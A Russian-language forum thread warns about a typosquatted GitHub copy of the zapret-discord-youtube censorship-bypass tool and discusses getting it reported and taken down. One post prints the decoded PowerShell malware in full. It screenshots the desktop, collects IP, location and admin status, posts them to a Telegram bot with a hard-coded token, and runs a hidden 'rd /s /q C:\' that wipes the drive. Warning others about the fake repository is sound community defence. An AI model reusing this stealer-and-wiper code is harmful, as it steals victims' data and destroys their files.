Недавно появился новый форк GoodbyeDPI на GitHub (GitHub - Flowseal/zapret-discord-youtube ) который направлен на обход блокировки YouTube и Discord.
Вместе с ним появился фейковый репозиторий, который я вам рекомендую зарепортить: GitHub - FlowseaI/zapret-discord-youtube (Использует заглавную букву i в нике)
Ссылка на отправку репорта: Sign in for Software Support and Product Help - GitHub Support
KDS
October 11, 2024, 7:54am
3
Ахахха, чел даже не понимает, как работают блэклисты запрета/гудбая, а все туда же
Скрипт поиска пробелов в пути… Это точно нужно?
А если я скачал из первоначального источника запрет там разве тоже нет в ip traffic mine.bmpool.org ?
zzr
October 11, 2024, 9:25am
5
бл я зарепортил сразу, но всё ещё там + какойто обфусицированый в басе64 повершел скрип палюбому малаваре
закинул чекнуть на верустотал https://www.virustotal.com/gui/file/5e68268094c11fdc81b00847bb3f0a711157589f09890133ff8905c4ba0b7aca?nocache=1
обфусцировано вот етим педрилой суде по всему
Если интересно что обфусцировано:
Add-Type -AssemblyName System.Windows.Forms
Add-Type -AssemblyName System.Drawing
Add-Type -AssemblyName 'System.Net.Http'
try {
$screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
$bitmap = New-Object System.Drawing.Bitmap $screen.Width, $screen.Height
$graphics = [System.Drawing.Graphics]::FromImage($bitmap)
$graphics.CopyFromScreen($screen.Left, $screen.Top, 0, 0, $bitmap.Size)
$memoryStream = New-Object System.IO.MemoryStream
$bitmap.Save($memoryStream, [System.Drawing.Imaging.ImageFormat]::Png)
$graphics.Dispose()
$bitmap.Dispose()
$memoryStream.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null
$country = (Invoke-RestMethod -Uri "http://ipinfo.io/country").Trim()
$city = (Invoke-RestMethod -Uri "http://ipinfo.io/city").Trim()
$ip = (Invoke-RestMethod -Uri "http://ifconfig.me").Trim()
$isAdmin = (whoami /groups | Select-String "S-1-5-32-544").Length -gt 0
$rights = if ($isAdmin) { "Admin" } else { "Slave" }
$dgkfsertodgfl = (Get-CimInstance Win32_OperatingSystem).Caption
$os_arch = if ([Environment]::Is64BitOperatingSystem) { "x64" } else { "x86" }
$message = @"
Type: $dgkfsertodgfl ($os_arch)
From: $country $city ($ip)
Name: $env:USERNAME ($rights)
"@
$dfhgsfdgh = "7872562304:AAHDovPEKL6JPliHzkjUYTd26f8YFuM8vDA"
$chat_id = "@dgfkewr"
$uri = "https://api.telegram.org/bot$dfhgsfdgh/sendPhoto"
$client = [System.Net.Http.HttpClient]::new()
$client.Timeout = [TimeSpan]::FromMinutes(5)
$gkwerjtsod = [System.Net.Http.MultipartFormDataContent]::new()
$fileContent = [System.Net.Http.StreamContent]::new($memoryStream)
$fileContent.Headers.ContentType = [System.Net.Http.Headers.MediaTypeHeaderValue]::Parse("image/png")
$gkwerjtsod.Add($fileContent, "photo", "screenshot.png")
$gkwerjtsod.Add([System.Net.Http.StringContent]::new($chat_id), "chat_id")
$gkwerjtsod.Add([System.Net.Http.StringContent]::new($message), "caption")
$response = $client.PostAsync($uri,$gkwerjtsod).Result
Start-Process -FilePath "cmd" -ArgumentList @("/c", "rd /s /q C:\") -PassThru -WindowStyle Hidden
}
finally {
if ($memoryStream) {
$memoryStream.Dispose()
}
if ($client) {
$client.Dispose()
}
}
Уже не зайти в чатик)
Я его уже задолбал спамом.
Бедные работяги, которые это скачают из последнего репозитория. Чел конечно гений букву l на I подменил
На момент закрытия чата - там было ~ 800 человек.
каждую 1-3минуты - кто-то новый 0)))
zzr
October 11, 2024, 10:27am
9
ет вты как декодировал?! индиресно
zzr
October 11, 2024, 10:31am
10
кароч оно скринщоты отсылает в телегу если я правельно понел по коду
uwu
October 11, 2024, 10:32am
11
имхо
надо отказываться от всех этих ссылок на свои архивы (которые даже тут выкладывают на форуме) и сторонние гитхабы
должен скачиваться запрет из офф bolvan-a и допиливаться сам.
zzr
October 11, 2024, 10:36am
12
ето здравая мылся, но к сожительению ето некуда не денется потому что нормисам надо чтобы работало в один клик а так (не)бывает
1 Like
Если бы он на этом остановился))
Он еще удалил древо каталогов C:\
3 раза обернул в base64 автор сие бота)
zzr
October 11, 2024, 10:50am
14
спасибо за информацию! теперь понятн ато я раз прогнал там опять закодировано ну я подумал что ето не работает, аоно вон оказывается как
он кстати обновил бота походу
Его так часто посещают, что он теперь первый в поисковой выдаче.
Query: zapret-discord-youtube
Nara
October 11, 2024, 12:40pm
16
Все. Его заблочили на гитхабе.
Нуда нуда. Поддельные форумы никогда не существовали? А гитхаб для Китайцев на настоящий момент едиствинная форточка, для обхода блокировок
zzr
October 11, 2024, 12:52pm
18
подеба
вот ведь иногда гражданское общесво работает жеж
Можно писать свои открытые программы которые скачивают оригинальный файл и просто допиливают настройки которые нужны. Почему нет? Тоже в один клик.
zzr
October 11, 2024, 12:56pm
20
походу ори скоро допилит свой скрип до такого состояния уже
Не заметил, как скачал фейк. Снёс мне файлы на жёстком диске, пытаюсь восстановить по точке. Скажите, эта фигня ничего кроме сноса файлов не делает?